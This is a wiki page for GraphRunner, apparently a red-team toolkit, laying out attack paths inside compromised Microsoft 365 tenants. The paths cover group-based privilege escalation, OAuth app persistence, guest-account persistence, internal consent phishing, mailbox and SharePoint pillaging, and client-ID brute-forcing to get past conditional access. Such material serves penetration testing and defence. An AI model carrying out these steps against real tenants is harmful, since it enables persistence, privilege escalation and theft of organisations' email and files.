Skip to content

Potential Attack Path Examples

Jump to bottom
Beau Bullock edited this page Oct 20, 2023 · 5 revisions

GraphRunner has a lot of different modules that do specific tasks but combining them can lead to interesting attack paths in certain scenarios. Below are a few examples where GraphRunner may benefit you in identifying potential situations where it can be used for persistence, privilege escalation, data harvesting, and more within an M365 account.

Group-Based PrivEsc (Adding user)

  1. Identify groups that can be modified by current user (Get-UpdatableGroups)
  2. Determine current access level (Get-SharePointSites, Invoke-DumpCAPS, Check for subscription access, Invoke-GraphRecon -PermissionEnum, etc.)
  3. Inject your user into the group (Invoke-AddGroupMember)
  4. Re-run enumeration modules to see if there is new access to sites/policies.

Bonus

Guest users can be injected into groups too but your current user (Entra ID user in the target tenant) needs to be injected first.

Dynamic Group PrivEsc (Abusing membership rule)

  1. Identify dynamic groups (Get-DynamicGroups) that have rules that can be abused such as a rule that adds a user to a group if their email contains “admin”.
  2. Analyze membership rules to determine if they can be abused.
    1. Example: Invite guest user to tenant with an email that has “admin” in the email address to get added as a member of a group where UPN’s that contain “admin” get automatically added to it.

Watering Hole Attack via Cloned Group

  1. Identify an interesting group (SharePoint Admins, Dev groups, other IT groups, etc.)
  2. Clone it and add your own user (Invoke-SecurityGroupCloner)
  3. Wait for an admin to mistakenly add your cloned group to a policy somewhere OR come up with a ruse to get it added
  4. Monitor access to various M365 pieces like SharePoint, Teams, CAPS policies, subscriptions, etc.

Persistence via OAuth App

  1. Inject an OAuth App registration (Invoke-InjectOAuthApp) into the same tenant as the compromised user.
  2. Setup a listener to complete the OAuth flow with either Invoke-AutoOAuthFlow to catch the redirect on your localhost or the AutoOAuthFlow.py script to catch it on another server.
  3. After consenting to the app it will generate tokens associated with the app registration that can be leveraged for accessing M365 as the user.
  4. If the user changes their password you still have access as the app.
  5. If all sessions get killed the refresh token of the app is still valid until it expires (default is 1 hour from creation time)

Persistence to SharePoint/OneDrive Files via Guest User access

If external sharing for a site is set to allow “Anyone” or “New and existing guests” access via external sharing then it may be possible to leverage a guest account for long term access to specific files.

Untitled

  1. Invite guest user to tenant (Invoke-InviteGuest).
  2. Gather SharePoint share links and maintain long term access to files until guest user is removed.

Internal Phishing via OAuth App

  1. Inject an OAuth app (Invoke-InjectOAuthApp) that has limited permissions (Mail.Read) into the same tenant as the compromised user.
  2. Use it to perform illicit consent grant phishing attacks internally for more access.

Find Other Mailboxes You Can Read

  1. Deploy an app with the “Mail.Read.Shared” scope into the victim tenant and consent to it with your user, or consent to this permission on the Graph Explorer and leverage the app token with GraphRunner.
  2. Use Invoke-GraphOpenInboxFinder to find other mailboxes that have been shared with you.
  3. Use Get-Inbox to pull the latest messages from other inboxes you can read.

Pillage SharePoint, Teams, and Email

  1. Leverage the pillage modules to identify sensitive data sent in email (Invoke-SearchMailbox, Get-Inbox), Teams chat (Invoke-SearchTeams, Get-TeamsChat) or SharePoint (Invoke-SearchSharePointAndOneDrive).
  2. Use the following command to perform “Snaffler-like” scanning of a SharePoint site:
    1. Invoke-GraphRunner -Tokens $tokens -DisableRecon -DisableUsers -DisableGroups -DisableCAPS -DisableApps -DisableEmail -DisableTeams

Search User Attributes

  1. Leverage the Invoke-SearchUserAttributes module to identify potentially sensitive information in Entra ID user attributes.

Immersive File Reader

  1. Use Invoke-SearchSharePointAndOneDrive to identify interesting files
  2. Use Invoke-ImmersiveFileReader to download them in some environments that block file downloads from SharePoint and OneDrive.

Find CAP Bypasses and Enumerate Permission Scopes Using Different Client IDs

  1. Gather a refresh token from an authenticated session (Ex. intercept browser)
  2. Use it with the Invoke-BruteClientIDAccess module to find applications that can authenticate or be refreshed to, along with their associated permission scopes.
Clone this wiki locally